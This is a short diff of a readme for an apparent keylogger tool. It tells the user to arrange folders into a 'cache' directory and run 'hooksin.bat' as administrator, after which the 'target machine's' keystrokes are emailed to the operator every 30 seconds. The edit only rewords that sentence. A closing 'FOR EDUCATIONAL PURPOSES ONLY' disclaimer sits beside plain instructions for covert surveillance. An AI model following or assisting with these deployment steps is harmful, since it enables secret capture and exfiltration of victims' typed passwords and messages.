jackloldavis89/crabbypatty/readme.txt

 Step 3.
 Add every folder but "hooksin.bat" to a new directory named "cache" Step 4.
 With hooksin.bat being in the same folder as the newly made "cache" run hooksin.bat in administrator.

-You're done, you will recieve emails every 30 seconds if they target machine has typed anything within those 30 seconds.
+You're done, you will recieve emails every 30 seconds, only if the target machine has typed anything within those 30 seconds.

 !!!!FOR EDUCATIONAL PURPOSES ONLY!!!!